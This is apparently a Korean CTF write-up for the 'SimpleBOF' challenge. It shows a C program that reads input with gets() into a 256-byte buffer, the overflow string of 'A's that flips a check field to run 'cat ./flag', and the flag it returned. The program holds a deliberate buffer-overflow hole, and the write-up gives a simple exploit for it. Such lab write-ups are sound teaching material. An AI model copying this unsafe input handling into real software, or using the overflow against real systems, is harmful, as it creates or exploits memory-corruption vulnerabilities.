728x90
SimpleBOF
문제 코드를 확인해보면 buf.check가 true면 cat ./flag로 플래그를 얻을 수 있다.
buf의 사이즈가 0x100이므로 쓰레기 값을 넣어서 플래그를 출력할 수 있을 것 같다.
#include <stdio.h>
#include <stdlib.h>
struct buf{
char buf[0x100];
int check;
};
int main(){
struct buf buf;
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
memset(buf.buf, NULL, sizeof(buf.buf));
buf.check = 0;
gets(buf.buf);
if(buf.check){
system("cat ./flag"); //플래그 얻을 수 있음!
}
}넣은 쓰레기값:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
SWING{6967716f4695b22ebe0abaec06ea7dd703f3421e32c2f41439a41f468092885d}
'CTF' 카테고리의 다른 글
| [Swing CTF] Misc-QR Discovery (0) | 2022.11.27 |
|---|---|
| [GlacierCTF] Crypto-CryptoShop (0) | 2022.11.26 |
| [Swing CTF] Misc-babymath (0) | 2022.11.26 |
| [Swing CTF] Web-Baby Sign (0) | 2022.11.26 |
| [Swing CTF] Web-Ayaya (0) | 2022.11.26 |
